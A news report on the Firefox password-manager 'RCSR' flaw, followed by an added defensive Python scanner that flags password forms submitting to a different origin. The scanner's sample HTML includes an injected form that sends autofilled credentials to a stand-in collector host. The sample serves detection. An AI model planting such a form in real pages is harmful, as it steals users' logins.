Dubbed the "Reverse Cross-Site Request" (RCSR) vulnerability by its discoverer, the flaw lies in Firefox's password-saving feature. Attackers can exploit it by crafting malicious HTML that hijacks a username and password saved for a legitimate site, such as a blog or message forum, and then transports the log-in to another site. Users would not notice that the theft had even taken place, said Robert Chapin, who reported the bug to Mozilla earlier this month.
Danish vulnerability tracker Secunia rated the threat as "Less critical," the second out of five possible rankings.
Chapin cited an October fraud on MySpace as the first evidence of an RCSR-based attack. "A recent large-scale attack using RCSR targeted MySpace.com users involved fake log-in forms on the MySpace site inviting users to type in their username and password," he wrote in a warning.
Current versions of Firefox, including 1.5.0.8 and 2.0, are vulnerable to RCSR attack; until a patch is available, users can deflect such attacks by disabling the automated password saving feature. In Firefox, users should select Tools|Options|Security, then clear the box marked "Remember passwords for sites."
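As an added example (not code from the article or from Mozilla), here is a server-side check a forum or blog operator could run over user-submitted HTML to catch the form shape described above: a form containing a password field whose action resolves to a different origin than the page it sits on. The hostnames and sample markup are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

def origin(url):
    # (scheme, host, port) so that an http and https target compare unequal
    p = urlsplit(url)
    scheme = p.scheme.lower()
    return (scheme, (p.hostname or "").lower(), p.port or {"http": 80, "https": 443}.get(scheme))

class CredentialFormScanner(HTMLParser):
    # Collects every <form> and whether it contains an <input type="password">
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "password": False}
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "text").lower() == "password":
                self._current["password"] = True
    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None

def find_cross_origin_credential_forms(page_url, html):
    """Return resolved action URLs of password forms that would submit off-origin."""
    scanner = CredentialFormScanner()
    scanner.feed(html)
    scanner.close()
    if scanner._current is not None:  # unterminated <form> at end of input
        scanner.forms.append(scanner._current)
    flagged = []
    for form in scanner.forms:
        if not form["password"]:
            continue
        target = urljoin(page_url, form["action"])  # relative actions stay on-origin
        if origin(target) != origin(page_url):
            flagged.append(target)
    return flagged

# Constructed sample: a forum page with its genuine login form, a search form,
# and a form injected into a post that sends the autofilled credentials elsewhere.
PAGE_URL = "http://forum.example.test/thread/42"
SAMPLE_HTML = """
<form action="/login"><input name="u"><input type="password" name="p"></form>
<form action="http://collector.example.test/grab"><input name="u"><input type="password" name="p"></form>
<form action="http://forum.example.test/search"><input name="q"></form>
"""
```

Running `find_cross_origin_credential_forms(PAGE_URL, SAMPLE_HTML)` returns only the injected form's target; a password form posting back to the page's own origin is not flagged, and a scheme downgrade (https page, http action) is treated as off-origin.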